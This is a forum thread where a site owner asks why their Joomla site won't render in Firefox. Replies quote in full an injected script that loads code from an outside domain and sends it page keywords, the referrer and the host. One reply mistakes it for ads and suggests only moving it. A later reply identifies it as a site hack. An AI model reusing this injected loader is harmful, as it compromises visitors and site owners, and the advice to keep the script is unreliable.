Firefox can't open my Joomla Website

Discuss how to use and promote Web standards with the Mozilla Gecko engine.
hack3rcon

Firefox can't open my Joomla Website

Post by hack3rcon »

Hello.
I have a website that made by Joomla 3.4.8 and my Mozilla version is 44.0.2 and I can't open my web site via it. My web site cna browse via Google Chrome and other.

Any idea?

Thank you.
DanRaisch

Re: Firefox can't open my Joomla Website

Post by DanRaisch »

Moving to Web Development.

What error are you seeing when trying to access that site?
What is the URL for that site?
hack3rcon

Post by hack3rcon »

DanRaisch wrote:Moving to Web Development.

What error are you seeing when trying to access that site?
What is the URL for that site?
My web site is "bgcloob.com" and "labreport.ir".
It just show my header web site text and not show any content :(
Frenzie

Post by Frenzie »

The browser console isn't showing me any errors. However, it's obvious that one of the scripts on the page is responsible. In fact the page loads just fine while NoScript blocks the scripts from the artcorporation.by domain. I assume it's some kind of ads?

Regadless of what it is, just stick the relevant code

Code: Select all

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://artcorporation.by/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://artcorporation.by/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
all the way at the bottom, just before </body>, instead of at the top just before </head>. That way it won't block the page from loading.
Intelligent alien life does exist, otherwise they would have contacted us.
hack3rcon

Post by hack3rcon »

Frenzie wrote:The browser console isn't showing me any errors. However, it's obvious that one of the scripts on the page is responsible. In fact the page loads just fine while NoScript blocks the scripts from the artcorporation.by domain. I assume it's some kind of ads?

Regadless of what it is, just stick the relevant code

Code: Select all

<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://artcorporation.by/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://artcorporation.by/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
all the way at the bottom, just before </body>, instead of at the top just before </head>. That way it won't block the page from loading.
What is your idea to Solve it? Which line of my Joomla must be removed?
Frenzie

Post by Frenzie »

Unfortunately I don't know how to phrase that any differently or clearer. That piece of script should go just before </body> instead of just before </head>.
Intelligent alien life does exist, otherwise they would have contacted us.
jscher2000

Post by jscher2000 »

I saw a similar code block in another site earlier today, and I think it means your site is hacked. You normally would not use a huge block of white space unless you were trying to hide something:

view-source:http://www.labreport.ir/ (lines 84-191)

Check the files used to generate the head section of the page, and make sure Joomla is patched up to date.
FoxyEmma

Post by FoxyEmma »

I tried using Joomla for a while with my blog, but found it really confusing and it was also giving me issues with Firefox, not displaying the page properly and so on :? So I decided to switch and create a blog on here, this time using Wordpress, which turned out to be a lot mre user-friendly.